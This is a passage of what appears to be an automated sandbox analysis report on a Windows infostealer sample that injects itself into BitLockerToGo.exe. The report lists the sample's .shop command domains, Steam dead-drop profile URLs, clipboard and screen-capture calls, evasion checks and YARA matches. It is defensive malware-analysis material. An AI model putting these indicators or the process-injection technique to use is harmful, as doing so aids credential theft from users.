            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stamppreewntnq.shop/Kx
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stamppreewntnq.shop/ux
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
            Source: BitLockerToGo.exe, 00000002.00000002.1646797955.000000000061D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.000000000061D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.naC
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
            Source: BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
            Source: BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/m
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
            Source: BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
            Source: BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900u
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
            Source: BitLockerToGo.exe, 00000002.00000002.1646797955.000000000061D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.000000000061D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.000000000061D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
            Source: BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeString found in binary or memory: https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comRequest
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeString found in binary or memory: https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttps://vault.azure.cn/vault.mi
            Source: BitLockerToGo.exe, 00000002.00000003.1636364105.0000000000607000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
            Source: BitLockerToGo.exe, 00000002.00000003.1636364105.0000000000607000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-m
            Source: BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49712 version: TLS 1.2
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00431530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard | 2_2_00431530
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00425380 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt | 2_2_00425380

            System Summary

            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: String function: 0040A310 appears 59 times
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: String function: 0040AA20 appears 134 times
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1595195957.0000000000707000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileName vs SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.00000000018AC000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Binary or memory string: OriginalFileName vs SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@3/0@11/3
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004365E0 CoCreateInstance | 2_2_004365E0
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | String found in binary or memory: net/addrselect.go
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
            Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Section loaded: powrprof.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Section loaded: umpdc.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: winhttp.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: webio.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mswsock.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: winnsi.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: sspicli.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: schannel.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mskeyprotect.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: msasn1.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: amsi.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: userenv.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: profapi.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: version.dll
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Static file information: File size 41135106 > 1048576
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x24d400
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x259a00
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: BitLockerToGo.pdb source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.00000000018AC000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: BitLockerToGo.pdbGCTL source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.00000000018AC000.00000004.00001000.00020000.00000000.sdmp
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Static PE information: section name: .symtab
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0043504B push ss; retf 2_2_0043504F
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00441F5C push cs; retf 2_2_00441F64
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 2044 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1646797955.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1646797955.0000000000578000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1646797955.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW~
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1595472375.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | API call chain: ExitProcess graph end node graph_2-15894
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process queried: DebugPort
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0043C800 LdrInitializeThunk, 2_2_0043C800

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: caffegclasiqwp.shop
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: stamppreewntnq.shop
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: stagedchheiqwo.shop
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: millyscroqwp.shop
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: evoliutwoqm.shop
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: condedqpwqm.shop
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: traineiwnqo.shop
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: locatedblsoqp.shop
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: nippydxmnwquo.shop
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2C6008
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 440000
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 443000
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 452000
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Queries volume information: C:\Windows VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Queries volume information: C:\Windows\AppReadiness VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
            Source: Yara match | File source: 2.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
